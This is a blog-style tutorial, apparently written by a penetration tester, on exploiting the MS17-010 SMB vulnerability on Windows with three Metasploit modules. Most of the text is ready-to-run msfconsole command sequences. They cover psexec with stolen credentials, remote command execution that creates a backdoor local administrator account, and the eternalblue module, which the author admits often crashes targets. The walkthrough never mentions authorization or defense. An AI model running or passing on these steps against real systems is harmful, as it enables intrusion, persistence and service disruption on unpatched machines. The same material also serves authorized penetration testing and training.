A Guide to Exploiting MS17-010 With Metasploit - 2020 Edition
One of the articles that I have written that got the most traction was the one regarding exploiting MS17-010 with Metasploit back in 2017. Well, things have changed, tools have changed, and methods have changed. Because of that, consider this the 2020 edition of that post.
Metasploit has released three (3) modules that can exploit this and are commonly used. I have listed the modules in order of most reliable to least reliable.
use exploit/windows/smb/ms17 _ 010 _ psexec with credentials
use auxiliary/admin/smb/ms17_ 010 _ command
use exploit/windows/smb/ms17_ 010 _ eternalblue
I’ll go into detail using each of the above as examples.
ms17_010_psexec with credentials
This module is by far the most reliable, however you do need credentials on the machine. Some use cases for this are the following.
You have regular domain user credentials on the network and want to get admin on a machine.
You have local user credentials for the machine and want to get admin
You want to validate the vulnerability exists using a stable exploit
Steps for using this exploit
msfconsole // fires up metasploit
use exploit/windows/smb/ms17_010_psexec // loads the metasploit module
set smbuser jsmith // sets the username when authenticating to the machine
set smbpass Password1 // sets the password for the user
set smbdomain CORP // sets the domain to use. If this is a local account, use WORKGROUP or WORKSTATION as this value.
set RHOST <IP ADDRESS> // this sets the IP address of the target machine. You need to replace IP <IP ADDRESS> with the IP address of the target system
run // this executes the command
The above exploit will work in almost all scenarios where the machine is vulnerable. This is the most reliable way to exploit MS17-010 on a machine.
ms17_010_command
This is the exploit I use in most cases as I don’t have any credentials and need to exploit a machine that I have found to be vulnerable. The commands to get this to work are the following.
use auxiliary/admin/smb/ms17_010_command // loads the metasploit module
set CMD net user james Password1 /add // adds the local user of “james” to the machine
set RHOST <<IP ADDRESS>> // this sets the IP address of the target machine. You need to replace IP <IP ADDRESS> with the IP address of the target system
run // this executes the command
Once this is run successfully, we will need to use this command again to change the local user we just created (james) to a local administrator. This can be done using the following commands.
set CMD net localgroup administrators james /add
Once this is done, we can use psexec, crackmapexec, RDP, etc. to gain access to the machine!
ms17_010_eternalblue
This is the ugly stepchild of MS17-010 exploits. Very flaky, high risk of crashing the SMB service on the machine. Alas, if you’re feeling lucky, this is what you need to do.
use exploit windows/smb/ms17_010_eternalblue // loads the Metasploit module
set RHOST <<IP ADDRESS>> // this sets the IP address of the target machine. You need to replace IP <IP ADDRESS> with the IP address of the target system
run // this executes the command
Chances are if you did not get a shell, you crashed the machine.